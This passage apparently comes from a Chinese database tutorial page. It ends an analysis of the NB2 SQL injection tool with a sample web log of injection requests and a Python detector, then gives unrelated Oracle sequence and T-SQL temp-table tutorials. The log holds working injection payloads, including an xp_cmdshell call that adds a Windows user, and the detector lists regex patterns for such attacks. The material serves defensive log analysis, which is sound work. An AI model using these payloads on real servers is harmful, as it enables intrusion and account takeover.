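2003-11-26 22:30:02 10.0.0.5 GET /article_read.asp id=80;declare%20@a%20int-- 200 Microsoft+URL+Control+-+6.00.8862
2003-11-26 22:30:03 10.0.0.5 GET /article_read.asp id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 500 Microsoft+URL+Control+-+6.00.8862
2003-11-26 22:30:05 10.0.0.5 GET /article_read.asp id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 500 Microsoft+URL+Control+-+6.00.8862
2003-11-26 22:30:09 10.0.0.5 GET /article_read.asp id=80;EXEC%20MASTER..XP_CMDSHELL%20'net%20user%20TsInternetUsers%20Password%20/add'-- 200 Microsoft+URL+Control+-+6.00.8862
2003-11-26 22:31:10 192.0.2.7 GET /article_read.asp id=81 200 Mozilla/4.0+(compatible;+MSIE+6.0)
"""

# Each pattern is matched against the URL-decoded, lower-cased query string.
INDICATORS = [
    ("stacked_query", re.compile(r";\s*(declare|exec|drop|create|alter|bulk)\b")),
    ("error_based", re.compile(r"char\(124\)|as varchar\(\d+\)\)")),
    ("schema_probe", re.compile(r"\b(sysobjects|syscolumns)\b|object_id\(")),
    ("role_probe", re.compile(r"\bis_(srvrolemember|member)\s*\(")),
    ("hex_obfuscation", re.compile(r"0x[0-9a-f]{8,}|(?:nchar\(\d+\)\+){3,}")),
    ("os_command", re.compile(r"xp_cmdshell")),
    ("bulk_file_read", re.compile(r"bulk\s+insert")),
    ("privilege_change", re.compile(r"sp_add(login|srvrolemember)|net\s+(user|localgroup)")),
]
NB2_AGENT = "Microsoft+URL+Control"   # the User-Agent seen in every capture above


def analyze_line(line):
    """Decode one log line and tag the injection techniques it contains."""
    _date, _time, ip, _method, _stem, query, status, agent = line.split()
    decoded = unquote(query).lower()
    return {
        "ip": ip,
        "status": int(status),
        "tags": [name for name, rx in INDICATORS if rx.search(decoded)],
        "nb2_agent": agent.startswith(NB2_AGENT),
        "decoded": decoded,
    }


def summarize(log_text):
    """Per-client view: how many requests were injections, how many raised a
    500 (error-based extraction lives on those), and which techniques appeared."""
    per_ip = defaultdict(lambda: {"requests": 0, "errors": 0, "injections": 0,
                                  "nb2_agent": 0, "tags": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = analyze_line(line)
        s = per_ip[r["ip"]]
        s["requests"] += 1
        s["errors"] += r["status"] == 500
        s["injections"] += bool(r["tags"])
        s["nb2_agent"] += r["nb2_agent"]
        s["tags"].update(r["tags"])
    return dict(per_ip)


def suspicious_clients(summary):
    """Clients that sent at least one tagged request or used NB2's User-Agent."""
    return [ip for ip, s in summary.items() if s["injections"] or s["nb2_agent"]]


if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s["requests"], "requests,", s["errors"], "x 500,", sorted(s["tags"]))
```

Only the query string is inspected, so this misses payloads sent in a POST body or in the articleid cookie; for those the application would have to log the values itself. The User-Agent check is a convenience, not a control: the string is trivially changed, whereas the burst of 500 responses to one client during error-based extraction is hard to hide.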

////////////////////////////////////////////////

That concludes the analysis of NB2's main functions; the rest you can work out yourselves. This is the first time I have written such a long article, so it may be messy and surely contains mistakes, but I really do not have the energy to go through it word by word. I hope it is understandable. Thanks!

hnxyy (虚空)

/11/26, 10:30 pm

Part 2: How to implement something like an auto-increment ID in Oracle (Database Tutorial)

When designing a database we often use a system-assigned ID as the primary key. Oracle has no such built-in feature, but the same effect can be achieved with a sequence.

1. First create the sequence:

create sequence seqmax increment by 1

2. Usage:

select seqmax.nextval ID from dual

which returns a new ID every time it runs.

If you put this statement in a trigger that fires before each insert and assigns the value to the key column, you get the same behaviour as the auto-increment ID in MS SQL.

Part 3: Two pieces of code that do the same job, with temporary tables and without (Database Tutorial)

-- Version 1: temporary tables

-- Save the old employee numbers once, if the backup table does not exist yet
if (not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[old_outid]') and OBJECTPROPERTY(id, N'IsUserTable') = 1))
begin
    select customerid,outid into old_outid from t_customers
    --update t_customers set utid='请输入新的学工号'
    /* -- restore the new employee numbers to the old values
    UPDATE T_Customers
    SET T_Customers.outid = old_outid.outid
    FROM old_outid
    WHERE old_outid.customerid = T_Customers.CustomerID
    */
end

-- Temporary table: department code -> full department name, one, two or three levels deep
select * into #dpt from (
    SELECT dpcode1+dpcode2+dpcode3 as 部门代码, dpname1+'/'+dpname2+'/'+dpname3 as 部门名称
    FROM T_Department where dpname1 is not null and dpname2 is not null and dpname3 is not null
    union all
    SELECT dpcode1+dpcode2+dpcode3 as 部门代码, dpname1+'/'+dpname2 as 部门名称
    FROM T_Department where dpname1 is not null and dpname2 is not null and dpname3 is null
    UNION ALL
    SELECT dpcode1+dpcode2+dpcode3 as 部门代码, dpname1 as 部门名称
    FROM T_Department where dpname1 is not null and dpname2 is null and dpname3 is null
) l

-- Temporary table: each customer's most recent card replacement
SELECT CustomerID, MAX(OpDt) AS 最近一次补卡时间 into #ReNewCard_MaxDt
FROM T_ReNewCard
GROUP BY CustomerID

SELECT 部门名称, Name AS 姓名, Alias AS 别名, CardType AS 卡类, c.outid AS 新工号, o.outid as 旧工号, 最近一次补卡时间
FROM T_Customers c
    inner join #dpt d on d.部门代码=c.account
    inner join #ReNewCard_MaxDt r on r.customerid=c.customerid
    inner join old_outid o on c.customerid=o.customerid
WHERE (c.CardType IN (1, 2))

drop table #dpt
drop table #ReNewCard_MaxDt

/* -- Version 2: derived tables, as you would write it for a view. Same result,
   -- harder to read, understand and modify, but usable in more places.
SELECT d.部门名称, c.Name AS 姓名, c.Alias AS 别名, c.CardType AS 卡类,
    c.outid AS 新工号, o.outid AS 旧工号, r.最近一次补卡时间
FROM T_Customers c INNER JOIN
    (SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码,
        dpname1 + '/' + dpname2 + '/' + dpname3 AS 部门名称
     FROM T_Department
     WHERE dpname1 IS NOT NULL AND dpname2 IS NOT NULL AND dpname3 IS NOT NULL
     UNION ALL
     SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码,
        dpname1 + '/' + dpname2 AS 部门名称
     FROM T_Department
     WHERE dpname1 IS NOT NULL AND dpname2 IS NOT NULL AND dpname3 IS NULL
     UNION ALL
     SELECT dpcode1 + dpcode2 + dpcode3 AS 部门代码, dpname1 AS 部门名称
     FROM T_Department
     WHERE dpname1 IS NOT NULL AND dpname2 IS NULL AND dpname3 IS NULL)
    d ON d.部门代码 = c.Account INNER JOIN
    (SELECT CustomerID, MAX(OpDt) AS 最近一次补卡时间
     FROM T_ReNewCard
     GROUP BY CustomerID) r ON r.CustomerID = c.CustomerID INNER JOIN
    old_outid o ON c.CustomerID = o.customerid
WHERE (c.CardType IN (1, 2))
*/
